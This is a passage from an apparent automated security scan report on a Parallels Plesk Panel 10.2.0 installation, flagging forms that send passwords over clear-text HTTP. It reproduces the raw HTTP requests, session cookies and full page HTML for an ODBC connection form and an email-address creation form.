</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

/plesk/client@2/domain@1/odbc/dsn@1/properties/

The form contains the following password field:

PWD

Request

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:09:15 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:09:15 GMT
Connection: close
Content-Length: 17771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Set Up an ODBC Connection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_connection_config_mssql/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
var required = new Array('DRIVER', 'SERVER', 'UID', 'PWD');

function chk_fields(f) {

   // scan form for input fields
   for (i=0; i<f.elements.length; i++) {

       if ((f.elements[i].type == 'text' || f.elements[i].type == 'password') && f.elements[i].value == '') {

           // find if this variable is required or not
           req = false;
           for (j=0; j<required.length; j++) {
               if (f.elements[i].name == required[j]) {
                   req = 1;
                   break;
               }
           }

           if (req) {

               // required elements should be set
               alert("Required parameters are not supplied.");
               f.elements[i].focus();
               f.elements[i].select();
               return false;

           } else {

               // don't submit empty not required variables
               f.elements[i].disabled = true;
           }
       }
   }
   return true;
}

function check_data(f) { if (chk_fields(f)) { f.cmd.value = 'check'; lsubmit(f); } }
function update_data(f) { if (chk_fields(f)) { f.cmd.value = 'update'; lsubmit(f); } }
function test_connection(f) { if (chk_fields(f)) { f.cmd.value = 'test'; lsubmit(f); } }
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@1/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">


<tr>
   <td class="name">[DRIVER] &nbsp;Driver</td>
   <td>SQL Server<input type="hidden" name="DRIVER" value="SQL Server"></td>
</tr>

<tr>
   <td class="name">[SERVER] &nbsp;<span class="required">*</span>&nbsp;Server</td>
   <td><input type="text" name="SERVER" value="(local)" ></td>
</tr>

<tr>
   <td class="name">[UID] &nbsp;<span class="required">*</span>&nbsp;Login ID</td>
   <td><input type="text" name="UID" value="" ></td>
</tr>

<tr>
   <td class="name">[PWD] &nbsp;<span class="required">*</span>&nbsp;Password</td>
   <td><input type="password" name="PWD" value="" ></td>
</tr>

<tr>
   <td class="name">[DATABASE] &nbsp;&nbsp;Default database for the ODBC data source</td>
   <td><input type="text" name="DATABASE" value="" ></td>
</tr>

<tr>
   <td class="name">[APP] &nbsp;&nbsp;Application name</td>
   <td><input type="text" name="APP" value="" ></td>
</tr>

<tr>
   <td class="name">[WSID] &nbsp;&nbsp;Workstation ID</td>
   <td><input type="text" name="WSID" value="" ></td>
</tr>

<tr>
   <td class="name">[LANGUAGE] &nbsp;&nbsp;Default national language to use</td>
   <td><select name="LANGUAGE" id="fid-LANGUAGE" >    <option value='' SELECTED></option>
   <option value='Arabic'>Arabic</option>
   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); 
return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /smb/email-address/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:36 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:36 GMT
Connection: close
Content-Length: 38552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>Create E-mail Address - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fcreate' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span>Create E-mail Address</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="" class="input-text" /><b> @ vulnerable.host.fqdn</b> </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
